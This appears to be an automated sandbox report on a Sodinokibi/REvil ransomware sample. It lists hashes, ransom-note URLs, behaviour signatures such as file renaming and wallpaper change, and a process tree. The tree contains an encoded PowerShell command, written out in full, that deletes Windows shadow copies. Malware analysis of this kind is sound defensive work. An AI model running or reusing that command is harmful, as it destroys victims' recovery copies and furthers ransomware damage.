Analysis
-
max time kernel
136s -
max time network
142s -
platform
windows10_x64 -
resource
win10 -
submitted
29-07-2020 14:01
Static task
static1
Behavioral task
behavioral1
Sample
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
Resource
win10
General
-
Target
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
-
Size
116KB
-
MD5
995f73ab9fe101249465c0514da4ec71
-
SHA1
6fab598e7536cab36e79b7fd3ca6581e4e806936
-
SHA256
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87
-
SHA512
8eb0573532a53b82e87741466c57d467c929cb5d3d7de9726e14a7ddae410e1c4da162c21c7cef2c5936ade7fc8ae28cb5e4804399b38ad1e4e0433032c43503
Malware Config
Extracted
C:\v4up0-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8856FFD5E2C6C8D5
http://decryptor.cc/8856FFD5E2C6C8D5
Signatures
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exepowershell.exepid process 720 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe 720 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe 364 powershell.exe 364 powershell.exe 364 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\g854k5.bmp" 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe -
Enumerates connected drives 3 TTPs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 720 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeBackupPrivilege 936 vssvc.exe Token: SeRestorePrivilege 936 vssvc.exe Token: SeAuditPrivilege 936 vssvc.exe Token: SeTakeOwnershipPrivilege 720 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exedescription pid process target process PID 720 wrote to memory of 364 720 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe powershell.exe PID 720 wrote to memory of 364 720 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe powershell.exe -
Drops file in Program Files directory 19 IoCs
Processes:
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exedescription ioc process File opened for modification \??\c:\program files\UndoSet.au3 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\CompleteReset.jpeg 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\ConfirmClear.potm 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\RevokeConfirm.reg 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\StartUnregister.docx 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\SwitchExpand.xps 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\JoinGroup.docx 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\RevokeGroup.clr 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File created \??\c:\program files\v4up0-readme.txt 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File created \??\c:\program files (x86)\v4up0-readme.txt 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\AssertSplit.potx 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\ConvertFromGroup.bmp 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\GroupSend.vb 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\CompressCopy.ods 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\RedoLimit.iso 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\ResumeWatch.css 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\CompareDisable.vssm 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\ExitApprove.jpeg 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File opened for modification \??\c:\program files\WatchOut.mpeg3 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\FindClear.png => \??\c:\users\admin\pictures\FindClear.png.v4up0 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File renamed C:\Users\Admin\Pictures\SearchCheckpoint.png => \??\c:\users\admin\pictures\SearchCheckpoint.png.v4up0 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File renamed C:\Users\Admin\Pictures\CompareOptimize.png => \??\c:\users\admin\pictures\CompareOptimize.png.v4up0 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File renamed C:\Users\Admin\Pictures\GroupDismount.tif => \??\c:\users\admin\pictures\GroupDismount.tif.v4up0 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe File renamed C:\Users\Admin\Pictures\ExitOpen.png => \??\c:\users\admin\pictures\ExitOpen.png.v4up0 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe"C:\Users\Admin\AppData\Local\Temp\96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Modifies extensions of user files
PID:720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3848
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:936